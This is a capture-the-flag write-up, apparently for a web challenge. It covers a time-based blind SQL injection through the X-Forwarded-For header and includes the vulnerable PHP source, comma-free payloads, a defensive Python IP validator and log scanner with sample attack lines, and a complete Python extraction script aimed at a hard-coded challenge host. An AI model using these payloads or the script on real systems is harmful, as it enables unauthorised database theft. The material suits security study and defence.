Challenge link: link
The challenge provides the source code (below). The site stores the IP address of each visitor.
Apart from the comma, no input is filtered: the value is concatenated directly into an insert into statement, so there is an injection point. Since nothing from the query is echoed back, a blind (time-based) injection is needed.
<?php
error_reporting(0);
// Returns the first comma-separated entry of X-Forwarded-For (fully client-controlled),
// falling back to REMOTE_ADDR when the header is absent
function getIp(){
    $ip = '';
    if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){
        $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
    }else{
        $ip = $_SERVER['REMOTE_ADDR'];
    }
    $ip_arr = explode(',', $ip);   // only the comma is "filtered": everything before the first comma survives
    return $ip_arr[0];
}
$host="localhost";
$user="";
$pass="";
$db="";
$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");
mysql_select_db($db) or die("Unable to select database");
$ip = getIp();
echo 'your ip is :'.$ip;
$sql="insert into client_ip (ip) values ('$ip')";   // $ip is interpolated unescaped: the injection point
mysql_query($sql);                                   // the result is never displayed, so only side effects (a delay) are observable
Because the comma is filtered, the if(a,b,c) form cannot be used for the test; use case when ... then ... else ... end instead.
Testing the database length: the site's response is delayed, which confirms the payload works.
Next, guessing names requires substr; the filtered comma can be replaced with from ... for, e.g.
substr((select flag from flag) from 1 for 1)
Appendix: complete step-by-step solution script for the challenge
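As an added example (not part of the original writeup, and in Python rather than the challenge's PHP), here is the defender's side of the same bug. The comma filter is a character blacklist, and the payloads above simply avoid commas; validating the header value as an IP address instead rejects all of them, because none of them parse. The same validator, run over access-log lines, doubles as a detector for the time-based probes. The log format (xff="..." rt=... fields) and the sample lines are constructed for this example and are not from the challenge.

```python
import ipaddress
import re

# Comma-free primitives seen in the writeup's payloads: delay functions, CASE WHEN,
# and substr(... FROM n FOR m). Matching them is only a detection signal; the control
# is to reject any header value that is not an IP address literal.
SUSPICIOUS = re.compile(
    r"\b(?:sleep|benchmark)\s*\(|\bcase\s+when\b|\bsubstr\s*\(.*?\bfrom\b.*?\bfor\b",
    re.IGNORECASE,
)


def first_hop(xff_header, remote_addr):
    """Same selection logic as the PHP getIp(): first comma-separated
    X-Forwarded-For entry if the header is present, else REMOTE_ADDR."""
    raw = remote_addr if xff_header is None else xff_header
    return raw.split(",")[0].strip()


def validate_client_ip(xff_header, remote_addr):
    """Return (ip, trusted). The header is accepted only when it parses as an
    IPv4/IPv6 literal; anything else falls back to the socket address and is
    reported as untrusted. A value that ipaddress accepts cannot contain a
    quote, a parenthesis or an SQL keyword, so there is nothing left to inject.
    (The INSERT should still use a bound parameter rather than string concatenation.)"""
    candidate = first_hop(xff_header, remote_addr)
    try:
        return str(ipaddress.ip_address(candidate)), True
    except ValueError:
        return remote_addr, False


# Constructed access-log lines in a hypothetical format that records the raw
# X-Forwarded-For value (xff="...", "-" when absent) and the response time in
# seconds (rt=...). These are not real logs from the challenge host.
LOG_RE = re.compile(r'^(?P<remote>\S+) .*? xff="(?P<xff>.*?)" rt=(?P<rt>[\d.]+)$')

SAMPLE_LOG = [
    '203.0.113.7 "GET /web15/ HTTP/1.1" 200 xff="203.0.113.7" rt=0.04',
    '198.51.100.9 "GET /web15/ HTTP/1.1" 200 xff="-" rt=0.03',
    '198.51.100.9 "GET /web15/ HTTP/1.1" 200 xff="127.0.0.1\' and case when(length(database())>3) then sleep(5) else 1 end)#" rt=5.02',
    '198.51.100.9 "GET /web15/ HTTP/1.1" 200 xff="127.0.0.1\' and case when(ascii(substr(database() from 1 for 1))=98) then sleep(5) else 1 end)#" rt=5.01',
    '203.0.113.7 "GET /web15/ HTTP/1.1" 200 xff="10.0.0.1, 203.0.113.7" rt=0.05',
]


def scan_log(lines, slow_seconds=4.0):
    """Return one finding per request whose X-Forwarded-For fails IP validation.
    Each finding records whether the value matches blind-injection syntax and
    whether the request was slow enough to look like a successful sleep() probe
    (the writeup's script treats anything over 4 s as a hit)."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a real scanner would count these separately
        xff = None if m["xff"] == "-" else m["xff"]
        _ip, trusted = validate_client_ip(xff, m["remote"])
        if trusted:
            continue
        findings.append({
            "remote": m["remote"],
            "value": m["xff"],
            "sqli_syntax": bool(SUSPICIOUS.search(m["xff"])),
            "slow": float(m["rt"]) >= slow_seconds,
        })
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Running the block prints two findings, both from 198.51.100.9, both flagged as injection syntax and both slow; the multi-hop header "10.0.0.1, 203.0.113.7" and the plain addresses pass validation and produce nothing. Note that a proxied deployment should only trust X-Forwarded-For from its own proxy in the first place; the validator covers the case where that trust decision was never made.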
import requests
import time

url="http://123.206.87.240:8002/web15/"
i=0
schelen=0
print("开始猜解数据库长度")
# Step 1: length of database(); the probe sleeps 5 s while length(database()) > i
while True:
    payload="127.0.0.1' and case when(length(database())>"+str(i)+") then sleep(5) else 1 end)#"
    # print(payload)
    start=time.time()
    headers={'X-Forwarded-For':payload}
    demo=requests.get(url,headers=headers)
    final=time.time()
    if final-start>4:   # delayed response: condition was true
        schelen+=1
        print(schelen)
    else:
        print("数据库名长度"+str(schelen))
        break
    i+=1

print("开始猜解database")
# Step 2: database name, one character per position via substr(... from j for 1)
flag=""
for j in range(1,schelen+1):
    for k in range(40,128):
        payload = "127.0.0.1' and case when(ascii(substr(database() from "+str(j)+" for 1))="+str(k)+") then sleep(5) else 1 end)#"
        # print(payload)
        start = time.time()
        headers = {'X-Forwarded-For': payload}
        demo = requests.get(url, headers=headers)
        final = time.time()
        if final-start>4:
            flag+=chr(k)
            print(flag)

print("开始猜解表名")
# Step 3: table names of the current database from information_schema
flag=""
for j in range(1,15):
    for k in range(40,128):
        payload = "127.0.0.1' and case when(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()) from "+str(j)+" for 1))="+str(k)+") then sleep(5) else 1 end)#"
        # print(payload)
        start = time.time()
        headers = {'X-Forwarded-For': payload}
        demo = requests.get(url, headers=headers)
        final = time.time()
        if final-start>4:
            flag+=chr(k)
            print(flag)

print("开始猜解flag表列名")
# Step 4: column names of the flag table (0x666c6167 is 'flag' in hex, avoiding quotes)
flag=""
for j in range(1,15):
    for k in range(40,128):
        payload = "127.0.0.1' and case when(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name=0x666c6167) from "+str(j)+" for 1))="+str(k)+") then sleep(5) else 1 end)#"
        # print(payload)
        start = time.time()
        headers = {'X-Forwarded-For': payload}
        demo = requests.get(url, headers=headers)
        final = time.time()
        if final-start>4:
            flag+=chr(k)
            print(flag)

print("开始猜解flag")
# Step 5: the flag value itself
flag=""
for j in range(1,35):
    for k in range(40,128):
        payload = "127.0.0.1' and case when(ascii(substr((select flag from flag) from "+str(j)+" for 1))="+str(k)+") then sleep(5) else 1 end)#"
        # print(payload)
        start = time.time()
        headers = {'X-Forwarded-For': payload}
        demo = requests.get(url, headers=headers)
        final = time.time()
        if final-start>4:
            flag+=chr(k)
            print(flag)